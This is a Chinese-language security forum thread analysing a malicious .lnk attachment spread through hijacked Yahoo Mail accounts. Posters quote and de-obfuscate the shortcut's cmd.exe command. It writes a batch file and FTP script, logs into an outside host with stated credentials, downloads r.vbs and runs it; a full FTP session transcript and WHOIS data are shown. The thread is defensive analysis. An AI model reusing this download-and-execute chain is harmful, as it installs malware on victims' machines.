|
Yahoo 信箱寄過來的病毒檔,是何種病毒? 1 個附加檔案 每隔一段時間,就會收到不同朋友使用 Yahoo 信箱寄過來的病毒檔,將該病毒檔上傳到 VirusTotal 又檢查不出病毒... 請問透過 Yahoo 信箱所寄的病毒,是 User 使用中毒電腦登入 Yahoo 信箱,病毒才透過Yahoo 信箱寄信給通信錄名單嗎? 還是 Yahoo 信箱帳密被盜,被人假用名義寄信.. 我將該病毒檔上傳到 VirusTotal 網站又檢測不出問題,真是怪異! 病毒信,信件內容如下: ######################################## 給你看我在網路上的第11個老婆的相片 10.15:9 ___________________________________________________ 您的生活即時通 - 溝通、娛樂、生活、工作一次搞定! [URL]http://messenger.yahoo.com.tw/[/URL] ############################################## 所夾帶的附檔以上傳 |
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒? Yahoo帳號被盜用,才從Yahoo寄信出來 (不管是透過標準SMTP還是Yahoo Webmail) 那個是"一連串動作的捷徑" 並不是木馬本體 掃不出來,很正常 |
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒? NIS 2010全殺 另外VT當然掃不出毒 因為他是做個捷徑到正常檔案 |
"3.5 KB" 頂多只是惡意網站連結 |
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒? [QUOTE=FYI;1072977]"3.5 KB" 頂多只是惡意網站連結[/QUOTE] FYI兄有興趣可以玩玩這東西 你就把它當.BAT檔來看就行了 .BAT檔如果有2K,能做的事情就多到跟山一樣了... |
[QUOTE=tvirus;1072983]FYI兄有興趣可以玩玩這東西 你就把它當.BAT檔來看就行了 .BAT檔如果有2K,能做的事情就多到跟山一樣了...[/QUOTE] .BAT 沒這麼容易從郵件裡執行吧! 就小弟的研判, 首先郵件是HTML 格式, 然後夾帶一個附件, 以HTML 語法執行一個附加檔案, 這點不太可能, 因為檔案必須先儲存, 若在HTML 內容直接執行指令, 這點小弟就外行了 用猜的還不如直接打開來看, 果然是兩個 "小么.lnk" |
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒? [QUOTE=FYI;1072986].BAT 沒這麼容易從郵件裡執行吧! 就小弟的研判, 首先郵件是HTML 格式, 然後夾帶一個附件, 以HTML 語法執行一個附加檔案, 這點不太可能, 因為檔案必須先儲存, 若在HTML 內容直接執行指令, 這點小弟就外行了 用猜的還不如直接打開來看, 果然是兩個 "小么.lnk"[/QUOTE] 是沒那麼容易執行啊 因為都要使用者自己笨笨的點下去啊 :fd: 既然都點下去了,當然就愛怎麼搞就怎麼搞 我不知道在大多數人的環境下,看不看得到那個副檔名?? (沒在用Outlook express,也很少用Webmail...) PS:其實應該要問,他們到底在不在意中木馬? |
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒? 請問那個 *.lnk 病毒的內容的目標欄位應該是指令,這些指令為何好像都被編碼? 請問如何將他還原為一般的指令? %coMsPeC% /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat& |
[QUOTE=~GG~;1072998]請問那個 *.lnk 病毒的內容的目標欄位應該是指令,這些指令為何好像都被編碼? 請問如何將他還原為一般的指令? %coMsPeC% /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&[/QUOTE] 抱歉! 小弟直到現在才明白tvirus 兄的意思, %COMSPEC%, START r.VBS, Call U.BAT, 原來.lnk 只是障眼法, 針對的還是Windows 的漏洞, 可否請樓主貼出完整信件的原始內容? |
回覆: Yahoo 信箱寄過來的病毒檔,是何種病毒? [QUOTE=FYI;1073010]抱歉! 小弟直到現在才明白tvirus 兄的意思, %COMSPEC%, START r.VBS, Call U.BAT, 原來.lnk 只是障眼法, 針對的還是Windows 的漏洞, 可否請樓主貼出完整信件的原始內容?[/QUOTE] 透過Prcview去看看這LNK做了啥事... 1. "C:\WINDOWS\system32\cmd.exe" /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat& 2. Ftp -s:j 先將1的部份以&來斷行 "C:\WINDOWS\system32\cmd.exe" /C set M=p -s:j SeT N=. sET y=G03 sET v=33 SeT e=echO EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B EChO %E%AA%v%^>^>j>>B ecHO %E%bb%v%^>^>j>>B echo %e%rECV r r.Vbs^>^>J>>B ECho %E%bY^>^>J>>b ECho Ft%M%>>b EchO STaRT r.VBs>>b reN b u.BAT CaLl U.Bat& 因為開始目錄為%windir% 所以在C:\WINDOWS產生了u.bat及J C:\WINDOWS>type u.bat %e%o WWw%n%%y%Z%N%CoM>J %E%AA%v%>>j %E%bb%v%>>j %e%rECV r r.Vbs>>J %E%bY>>J Ft%M% STaRT r.VBs C:\WINDOWS>type j o www . g03z . com AA33 bb33 rECV r r.Vbs bY 所以...目地是用ftp指令,代入script檔案J連到www . g03z . com 帳號密碼輸入後,抓r.vbs回來,然後下指令by斷線 過程: C:\WINDOWS>ftp www . g03z . com Connected to www . g03z . com. 220 Serv-U FTP Server v6.4 for WinSock ready... User (www . g03z . com:(none)): AA33 331 User name okay, need password. Password: 230 User logged in, proceed. ftp> rECV r r.Vbs 200 PORT Command successful. 150 Opening ASCII mode data connection for r (1327 Bytes). 226-Maximum disk quota limited to 102400 kBytes Used disk quota 0 kBytes, available 102400 kBytes 226 Transfer complete. ftp: 1327 bytes received in 0.01Seconds 88.47Kbytes/sec. ftp> by 221 Goodbye! ==================================================== 然後u.bat最後再start r.vbs 至於那個r.vbs內容是啥...呃...交給你們了... 睡覺前最後PS: 那個g03z,好像是有名的放毒站... 最糟糕的是 主機它在台灣 :Q [url]http://www.db.ripe.net/whois?form_type=advanced&full_query_string=&searchtext=202.153.172.43&do_search=Search&inverse_attributes=None&ip_search_lvl=Default%28nearest+match%29&alt_database=ALL&object_type=All[/url] Domain Name : g03z.com PunnyCode : g03z.com Creation Date : 2009-01-08 16:50:39 Updated Date : 2009-01-08 16:50:39 Expiration Date : 2010-01-08 16:50:21 Registrant: Organization : ggg zzz Name : zzzzggg Address : wefwefw wefwefwef City : 34234234 Province/State : jiangsu Country : CN Postal Code : 234234 Administrative Contact: Name : ggg zzz Organization : zzzzggg Address : wefwefw wefwefwef City : 34234234 Province/State : jiangsu Country : CN Postal Code : 234234 Phone Number : 86--02586883333 Fax : 86--02586883333 Email : [email][email protected][/email] Technical Contact: Name : ggg zzz Organization : zzzzggg Address : wefwefw wefwefwef City : 34234234 Province/State : jiangsu Country : CN Postal Code : 234234 Phone Number : 86--02586883333 Fax : 86--02586883333 Email : [email][email protected][/email] Billing Contact: Name : ggg zzz Organization : zzzzggg Address : wefwefw wefwefwef City : 34234234 Province/State : jiangsu Country : CN Postal Code : 234234 Phone Number : 86--02586883333 Fax : 86--02586883333 Email : [email][email protected][/email] Registry Status: ok |
| 所有時間均為 +8。現在的時間是 08:10 AM。 |
| XML | RSS 2.0 | RSS |
本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。